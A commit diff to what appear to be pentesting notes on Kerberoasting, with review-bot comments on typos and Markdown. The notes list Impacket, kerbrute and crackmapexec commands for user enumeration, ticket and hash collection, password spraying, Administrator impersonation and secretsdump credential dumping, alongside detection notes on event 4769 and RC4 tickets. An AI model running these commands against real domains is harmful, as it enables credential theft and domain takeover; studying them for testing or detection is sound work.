added kerberoastable information

gurkenhabicht 2026-04-03 21:17:36 +02:00
parent 6bd59faa8f
commit ccaa96dab5
2 changed files with 28 additions and 11 deletions

View File

@ -1,5 +1,10 @@
# Kerberoast
An indicator for kerberoast are downgraded RC4 encryption instead of AES.
That means `Ticket_Encryption_Type=0x17` (RC4) instead of `0x12` (AES-256).
The event code for TGS, which is needed for kerberoasting is `4769`.
## Usage
### List users
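Review bot: The first sentence added under `# Kerberoast` has a subject/verb mismatch and reads as if RC4 alone proves an attack; suggest "An indicator for Kerberoasting is a service ticket issued with RC4 instead of AES." The following line compares only `0x17` and `0x12`, so AES-128 (`0x11`) is missing, and `Ticket_Encryption_Type` is written as a parsed field name without saying which log source or parser produces it. It would also help to state that `4769` with `0x17` needs a baseline, because services that still legitimately negotiate RC4 log the same value.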
@ -10,17 +15,21 @@ kerbrute userenmum --dc $TARGET_IP --domain $DOMAIN $USER_LIST --downgrade
```
### Get Users
* Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
```
### Find SPNs
```sh
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
or
```sh
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
```
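Review bot: In the second code block of `### Find SPNs`, `pyverview` looks like a misspelling of `pywerview`, so the command will not be found as written. The hunk header context also shows `kerbrute userenmum`, where the kerbrute subcommand is `userenum`; that is worth fixing in the same commit. The two `GetUserSPNs.py -request` lines are textually identical here, so if the change is whitespace only it just adds noise to the history. `### Get Users` documents `GetNPUsers.py`, which collects AS-REP hashes for accounts without pre-authentication rather than service tickets; a one-line remark would keep it from being read as part of the Kerberoast step.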
@ -32,12 +41,17 @@ findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
### Check Found Users
* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```
* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
* Change password with
Watch out for `STATUS_PASSWORD_MUST_CHANGE`
Change password with
```sh
smbpasswd.py <user>@$TARGET_IP -newpass password123
```
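Review bot: Under `### Check Found Users`, the lines "Watch out for `STATUS_PASSWORD_MUST_CHANGE`" and "Change password with" lose their `*` markers and now sit on consecutive lines, so Markdown will join them into one paragraph. Either keep the list markers or separate the two lines with a blank line and end the second with a colon. The example value in `-newpass password123` would be better as a placeholder such as `<NEW_PASSWORD>`, matching `<user>` on the same line.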
@ -47,10 +61,12 @@ smbpasswd.py <user>@$TARGET_IP -newpass password123
```sh
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
```
* Serviceticket is save as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
* After that dump secrets
```sh
secretsdump.py -k -no-pass <DOMAIN>
```
* Serviceticket is safe as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
After that dump secrets:
```sh
secretsdump.py -k -no-pass <DOMAIN>
```
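Review bot: The line about `Administrator.ccache` changes "save" to "safe", but the intended word is "saved"; suggest "Service ticket is saved as `Administrator.ccache`". "After that dump secrets:" follows the `export KRB5CCNAME=Administrator.ccache` bullet with no blank line, so Markdown treats it as a continuation of that list item; add a blank line before it. The `export` would also read better inside the `sh` block directly above `secretsdump.py -k -no-pass <DOMAIN>`, since both are typed in the same shell session.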

View File

@ -65,6 +65,7 @@ The `subject` is the account doing an action on an `object`.
* **4756**: Attempt to add an account to a universal security group
* **4757**: Attempt to remove an account from a universal security group
* **4768**: Kerberos TGT request
* **4769**: Kerberos TGS request
* **4771**: Kerberos pre-auth failure
### Account Logon
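Review bot: The new `4769` entry says only "Kerberos TGS request", while the Kerberoast page changed in this commit relies on this event and its ticket encryption type. Suggest wording it as "Kerberos service ticket (TGS) request" and linking to the Kerberoast note, so a reader of this list finds the `0x17` versus `0x12` check.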